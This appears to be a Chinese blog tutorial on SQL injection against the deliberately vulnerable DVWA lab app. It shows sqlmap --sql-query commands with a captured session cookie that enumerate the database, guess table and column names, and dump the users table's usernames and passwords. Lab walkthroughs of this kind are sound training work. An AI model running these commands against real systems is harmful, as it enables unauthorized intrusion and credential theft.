SQL注入实战— SQLMap之(--sql-query)辅助手工注入


当你的才华

还撑不起你的野心时

那你就应该静下心来学习

 


 

利用sqlmap选项--sql-query辅助手工注入

备注:我用的这个靶场环境是某平台的线上靶机,内容有参考地方

1.打开http://10.1.1.136,输入用户名:admin 密码:password,登录

2.找到并打开SQL Injection,随便提交一个数,打开burpsuite抓包,然后点击submit,获取cookie

     SQL注入实战— SQLMap之(--sql-query)辅助手工注入_第1张图片

然后就是Burp抓取数据包,再做第3步骤

3.使用内置函数获取用户名,版本,数据库名等信息,就是Mysql 数据库内置的函数,user()、version()、database()

      输入:sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --

cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --sql-query "select user(),version(),database()" 

      

4.得到数据库名为dvwa,接下来猜表

      输入:sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --

cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --sql-query "(select count(*) from dvwa.users)>0"

      SQL注入实战— SQLMap之(--sql-query)辅助手工注入_第2张图片

5.返回1,说明存在users表,然后开始猜列

      输入:sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --

cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --sql-query "(select count(username) from dvwa.users)>=0"

      SQL注入实战— SQLMap之(--sql-query)辅助手工注入_第3张图片

6..没有返回,说明不存在username列,将username改为user,返回1。

      

      输入:sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --

cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --sql-query "(select count(password) from dvwa.users)>=0"

      

7.得到了列名,现在我们来猜内容

      输入:sqlmap.py -u "http://10.1.1.136/vulnerabilities/sqli/?id=1&Submit=Submit" --

cookie="PHPSESSID=q3bm4gupu58dqptm0lve1o12u4; security=low" --sql-query "select user,password from dvwa.users"

      SQL注入实战— SQLMap之(--sql-query)辅助手工注入_第4张图片

      最后的最后,我们就可以得到对应账户的用户名和密码,搜嘎,是不是感觉和前面SQLMap的注入操作步骤很相似,但再这篇文章,我们用的是--sql-query来实现爆破账户和密码,当然用--sql-query 爆破密码的方法肯定不止上述的这一种,大家不妨想想还有什么其它的解法?

 


我不需要自由,只想背着她的梦

一步步向前走,她给的永远不重


 

你可能感兴趣的:(渗透测试,SQLMap,前渗透篇)